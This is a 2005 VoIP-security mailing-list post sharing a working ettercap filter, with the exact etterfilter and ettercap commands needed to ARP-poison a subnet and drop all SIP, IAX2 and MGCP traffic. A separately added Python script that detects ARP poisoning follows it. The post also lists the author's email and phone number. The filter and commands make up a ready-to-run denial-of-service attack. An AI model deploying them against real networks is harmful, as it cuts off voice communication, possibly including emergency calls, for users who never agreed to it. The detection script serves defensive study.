[VOIPSEC] VoIP Blocking Filter w/Ettercap
Natas
natas05 at gmail.com
Tue Jul 12 20:09:18 CDT 2005
After playing around with ettercap and its filter program,
etterfilter, I realized how easy it would be to ARP poison a network
and block all VoIP packets from passing through. While packet
manipulation obviously isn't new, and the root of the problem comes
from the ease of ARP poisoning, I was still kind of shocked at how
easily an attack like this could be pulled off in a real-world scenario.
A simple ettercap filter can be used to block all SIP, IAX2 and MGCP
traffic, stopping any possible communication across a network segment,
but letting other traffic properly pass through. Below is a basic
filter I wrote up for this list.

# blockvoip.filter
# Proof of concept VoIP blocking filter
# By Natas
# Instructions:
# Run "etterfilter blockvoip.filter -o blockvoip.ef"
# Then "ettercap -T -q -F blockvoip.ef -M ARP /10.1.1.1-254/ //"

if (ip.proto == UDP && udp.src == 4569) {
    msg("Killed Attempted IAX2 Connection.\n");
    drop();
    kill();
}

if (ip.proto == UDP && udp.src == 5060) {
    msg("Killed Attempted SIP Connection.\n");
    drop();
    kill();
}

if (ip.proto == UDP && udp.src == 2427) {
    msg("Killed Attempted MGCP Connection.\n");
    drop();
    kill();
}

# Don't know too much about MGCP Call Agent traffic but
# I put it in here for the hell of it.
if (ip.proto == UDP && udp.src == 2727) {
    msg("Killed Attempted MGCP Call Agent Connection.\n");
    drop();
    kill();
}

# End.

Obviously this is just a simple example and could easily be expanded
to ensure that no VoIP traffic whatsoever passes through.
I'm not sure how everyone here will feel about this little example but
I wanted to put it out there for everyone to see. I have some other
VoIP packet manipulation ideas that I am playing around with.
I enjoy the VoIPSA mailing list very much and like reading everyone's
posts and concerns. If you would like to talk off the list, feel free
to email me or contact me at 206-338-3337.
Natas
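
A defender-side companion to the post above, as an added example that is not part of the original message: since the filter only works once the segment has been ARP poisoned, this sketch flags the two signs of that in a stream of ARP replies, an IP address changing MAC and one MAC claiming many IPs. The function name, the threshold and the sample replies are assumptions constructed for illustration; how the replies are collected (capture, switch logs) is left to the reader.

```python
from collections import defaultdict

# Constructed ARP replies (timestamp, sender IP, sender MAC); not real capture data.
SAMPLE_ARP_REPLIES = [
    (0.0, "10.1.1.1", "00:11:22:33:44:01"),   # gateway
    (0.5, "10.1.1.20", "00:11:22:33:44:20"),  # IP phone
    (1.0, "10.1.1.21", "00:11:22:33:44:21"),  # IP phone
    (5.0, "10.1.1.1", "de:ad:be:ef:00:99"),   # gateway IP claimed by a new MAC
    (5.1, "10.1.1.20", "de:ad:be:ef:00:99"),
    (5.2, "10.1.1.21", "de:ad:be:ef:00:99"),
    (6.0, "10.1.1.1", "00:11:22:33:44:01"),   # real gateway answers again
]


def find_arp_poisoning(replies, max_ips_per_mac=2):
    """Return alerts for IP->MAC rebinding and for one MAC claiming many IPs.

    max_ips_per_mac is an assumed threshold; raise it on segments where
    routers or proxy-ARP devices legitimately answer for several addresses.
    """
    ip_to_mac = {}                   # last MAC seen for each IP
    mac_to_ips = defaultdict(set)    # every IP each MAC has claimed
    flagged_macs = set()             # avoid repeating the multi-ip alert
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        known = ip_to_mac.get(ip)
        if known is not None and known != mac:
            # The binding changed: a DHCP change, or a poisoned cache entry.
            alerts.append(("rebind", ts, ip, known, mac))
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > max_ips_per_mac and mac not in flagged_macs:
            flagged_macs.add(mac)
            alerts.append(("multi-ip", ts, mac, sorted(mac_to_ips[mac])))
    return alerts


if __name__ == "__main__":
    for alert in find_arp_poisoning(SAMPLE_ARP_REPLIES):
        print(alert)
```

A rebind of the gateway address followed by the old MAC answering again is the pattern to treat as highest priority, since a legitimate address change does not flip back.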